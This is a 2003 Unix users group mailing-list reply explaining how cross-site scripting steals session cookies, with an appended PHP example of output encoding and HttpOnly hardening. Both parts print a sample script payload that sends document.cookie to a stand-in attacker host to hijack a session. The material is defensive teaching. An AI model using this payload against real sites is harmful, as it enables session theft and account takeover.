On Wed, 2003-06-18 at 21:21, Michael Ryan Byrd wrote:
> Sometimes when a cross site scripting bug is found in a particular web
> application, the bug tracking sites will say, "Exploitation of this issue
> may enable an attacker to steal cookie-based authentication credentials from
> legitimate users of the software."
> 
> How is that possible?

Let's say you write a web authentication system using PHP. When somebody
logs in, you store the username and a token in their session. PHP keeps
track of that session via cookies, namely the PHPSESSID cookie. 

Now a cookie has a domain and path associated with it so that cookies
from site A aren't accessible from site B. But using cross site
scripting (XSS), you can trick the browser into sharing the cookies.

For this to work, a site has to accept user input and then display it
back to the user. A blog is a good example. Joe Cracker signs up for an
account and posts a message. His message contains HTML which isn't
properly sanitized before being saved in the database. Now when Larry
Admin comes along to read comments to his story, he sees Joe's message.
The HTML does something like this:

  <script language="javascript">
  window.open("http://crackerz.com/steal.cgi?sess=" + document.cookie);
  </script>

This works because the window is being opened within the cookie's domain
and path. The steal.cgi maybe shows some annoying ad so Larry doesn't
realize he's been had. All Joe has to do is change his cookie to match
Larry's and now to the system, he *is* Larry.

The solution to this is to check for HTML in all user input before doing
anything with it.

How about some references. An XSS overview[1]. How to exploit XSS
holes[2]. XSS defense in Perl[3]. An XSS filter for PHP[4]. Input
validation[5].

There's another really good one that I can't find right now. I'll post a
follow up if I stumble upon it.

Corey

1. http://www.cgisecurity.com/articles/xss-faq.shtml
2. http://www.idefense.com/XSS.html
3. http://www.perl.com/pub/a/2002/02/20/css.html
4. http://www.mricon.com/html/phpfilter.html
5. http://www.owasp.org/asac/input_validation/css.shtml
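The blog-comment scenario above, carried through on the PHP side as an added example (not code from the original mail or from any of the referenced pages). The function names, the sample comment and the placeholder host are constructed for illustration; the PHP settings and functions used (session.cookie_httponly, htmlspecialchars, strip_tags) are standard PHP. It shows the raw echo that lets Joe's script reach Larry's browser beside the encoded rendering that turns it into visible text, plus the cookie flag that keeps PHPSESSID out of document.cookie in the first place.

```php
<?php
// Added example, not part of the original post. Hardening the blog-comment
// scenario: cookie flags, output encoding, and an input-side check.

// Keep the session cookie out of document.cookie (HttpOnly) and off plain
// HTTP (Secure). These must be set before session_start() is called.
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');

// Vulnerable rendering: the stored comment is echoed as raw HTML, so a
// comment containing <script> runs in every reader's browser, inside the
// blog's cookie domain and path.
function render_comment_vulnerable(string $body): string {
    return '<div class="comment">' . $body . '</div>';
}

// Hardened rendering: encode the comment for the HTML context it lands in.
// The tags are still stored verbatim in the database, but the browser
// displays them as text instead of executing them.
function render_comment_safe(string $body): string {
    $encoded = htmlspecialchars($body, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="comment">' . $encoded . '</div>';
}

// Input-side check in the spirit of the mail's advice: flag submissions that
// contain anything tag-like. Useful for logging or rejecting, but it has
// false positives (a bare "<" in prose) and is easy to bypass on its own;
// output encoding is the control that actually stops the script.
function contains_markup(string $input): bool {
    return $input !== strip_tags($input);
}

// Constructed sample comment, same shape as the payload the mail describes.
// example.invalid is a reserved placeholder host, not a real site.
$joes_comment = '<script>window.open("http://example.invalid/steal.cgi?sess="'
              . ' + document.cookie);</script>';

var_dump(contains_markup($joes_comment));                 // bool(true)
echo render_comment_vulnerable($joes_comment), PHP_EOL;  // <script> reaches the browser
echo render_comment_safe($joes_comment), PHP_EOL;        // &lt;script&gt;... shown as text
```

Run it with the PHP CLI to compare the two rendered strings. The point of the HttpOnly flag is that even if a script does slip through, `document.cookie` no longer contains PHPSESSID, so the cookie-copying step the mail describes has nothing to copy; encoding at output time is what prevents the script from running at all.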


____________________
BYU Unix Users Group 
http://uug.byu.edu/ 
___________________________________________________________________
List Info: http://uug.byu.edu/cgi-bin/mailman/listinfo/uug-list
